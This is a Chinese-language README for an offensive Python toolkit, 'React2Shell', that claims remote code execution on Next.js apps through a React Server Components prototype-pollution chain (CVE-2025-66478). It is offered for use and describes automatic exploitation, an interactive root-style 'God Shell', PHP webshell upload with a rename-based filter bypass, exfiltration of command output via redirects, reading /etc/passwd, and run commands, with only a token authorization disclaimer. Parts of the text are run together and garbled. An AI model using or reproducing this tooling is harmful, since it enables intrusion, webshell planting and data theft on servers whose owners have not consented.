
React2Shell - CVE-2025-66478 RCE利用
该 Python 工具包利用 Next.js React Server Components (RSC) 原型污染 + React.lazy(-1) gadget 链实现完全 RCE 访问,包括交互式上帝 shell、文件上传(PHP webshell 植入器)以及通过 ?out= 进行数据外泄。

自动检测与利用脆弱的 Next.js 应用(例如 target.com)。生成 uid=33(www-data) shell,支持:
child_process.execSync 实现 RCE → /exploit?out=UIDread /etc/passwd)、上传{\"0\":null} → 500 确认 RSC 处理器。E{\"digestLocation: /exploit?out=id_outputexecSync(cmd) → 通过重定向外泄 stdout/stderr。upload_txt local.txt remote.php → 写入+重命名绕过。pip3 install aiohttppython3 main.pyhttp://target.com 或 targets.txt1=检测 2=PoC(id) 3=自定义 4=God Shell [4]Piped: echo \"http://target\n4\" | python3 main.py
God Shell 命令:
upload <local.php> <remote/shell.php> # 直接 PHP 上传
upload_txt <local> <remote/shell.php> # TXT→重命名绕过
upload_bin <local> <remote> # 二进制文件(稍后 chmod)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNERABLE] → uid=33(www-data)aiohttp
pip install aiohttp
仅限授权渗透测试与教育目的(用户已同意在服务条款下获得许可)。未经授权使用属非法/不道德行为。
请我喝杯咖啡:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans